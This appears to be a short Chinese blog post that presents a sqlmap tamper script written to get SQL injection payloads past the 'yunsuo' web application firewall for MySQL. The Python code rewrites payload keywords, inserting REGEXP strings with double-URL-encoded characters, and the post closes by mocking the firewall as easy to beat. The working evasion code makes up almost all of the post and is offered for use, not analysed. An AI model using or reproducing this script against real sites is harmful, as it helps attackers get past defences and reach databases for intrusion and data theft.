bypass
渗透测试确实是一门艺术,需要独特的方法、坚持的决心、长期的经验以及快速学习新技术的能力。非常期待渗透过程中出现的独特挑战,并欣赏该领域的动态特性 。
*- coding: utf-8 -*
import re
import os
from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("Bypass yunsuo by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload, **kwargs):
payload=payload.replace(" "," ",1)
payload=payload.replace(" AND"," REGEXP \"[...%252523]\" and",1)
payload=re.sub(r'(ORDER BY \d+)', "x", payload)
payload=payload.replace("UNION"," REGEXP \"[...%252523]\" union",1)
payload=payload.replace("(SELECT (CASE WHEN ("," REGEXP \"[...%252523]\" (SELECT (CASE WHEN (",1)
payload=payload.replace(" AS "," REGEXP \"[...%252523]\" as ",1)
payload=payload.replace(" OR "," REGEXP \"[...%252523]\" or ",1)
payload=payload.replace(" WHERE "," REGEXP \"[...%252523]\" where ",1)
payload=payload.replace("HIGH_RISK_OPERATION:0"," REGEXP \"[...%252523]\" ",1)
payload=payload.replace(";","; REGEXP \"[...%252523]\" HTGH",1)
payload=payload.replace("||","; || REGEXP \"[...%252523]\" ",1)
payload=payload.replace("THEN"," THEN REGEXP \"[...%252523]\" ",1)
payload=payload.replace(" IN"," REGEXP \"[...%252523]\" IN ",1)
payload=payload.replace("+"," REGEXP \"[...%252523]\" + ",1)
payload=payload.replace("WHEN"," REGEXP \"[...%252523]\" ",1)
return payload
换个payload就行了,好蠢啊哈哈哈

浙公网安备 33010602011771号